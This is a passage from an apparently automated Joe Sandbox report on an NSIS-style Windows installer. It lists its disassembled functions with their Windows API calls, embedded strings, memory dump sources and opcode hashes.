                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                          • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                          • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                          Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                          • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                          • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                          Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                          • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                          • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                          Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                          Download Yara Rule
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                          • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                          • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

                                          Non-executed Functions

                                          Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                          • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                          • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                          • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                          • DeleteObject.GDI32(?), ref: 00404A79
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                          • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                          • GlobalFree.KERNEL32(?), ref: 00404DAC
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                          • ShowWindow.USER32(?,00000000), ref: 00404F49
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                          • ShowWindow.USER32(00000000), ref: 00404F5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $ @$M$N
                                          • API String ID: 1638840714-3479655940
                                          • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                          • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                          • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                          Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                          • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                          • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                          • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                          • SetWindowTextW.USER32(?,?), ref: 00404583
                                          • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                          • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                          • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                            • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                            • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                            • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                            • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                            • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                            • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                          • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                          • String ID: 82D$@%F$@rD$A
                                          • API String ID: 3347642858-1086125096
                                          • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                          • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                          • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                          Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                          • CloseHandle.KERNEL32(?), ref: 004071E6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                          • API String ID: 1916479912-1189179171
                                          • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                          • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                          • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                          Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                          • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                          • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                          • lstrlenW.KERNEL32(?), ref: 00406D2C
                                          • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                          • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                          • FindClose.KERNEL32(?), ref: 00406E33
                                          Strings
                                          • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                          • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                          • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                          • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                          • \*.*, xrefs: 00406D03
                                          • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                          • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                          • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                          • API String ID: 2035342205-3294556389
                                          • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                          • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                          • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                          Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                          • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                          • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                          • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 3581403547-784952888
                                          • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                          • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                          • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                          Strings
                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                          • API String ID: 542301482-1377821865
                                          • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                          • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                          • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                          Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                          • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                          • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                          Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                          • lstrlenW.KERNEL32(?), ref: 004063CC
                                          • GetVersionExW.KERNEL32(?), ref: 0040642A
                                            • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                          • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                          • GlobalFree.KERNEL32(?), ref: 004064DD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                          • API String ID: 20674999-2124804629
                                          • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                          • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                          • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                          Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                          • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                          • GetSysColor.USER32(?), ref: 004041AF
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                          • lstrlenW.KERNEL32(?), ref: 004041D6
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                            • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                            • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                          • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                          • SendMessageW.USER32(00000000), ref: 00404251
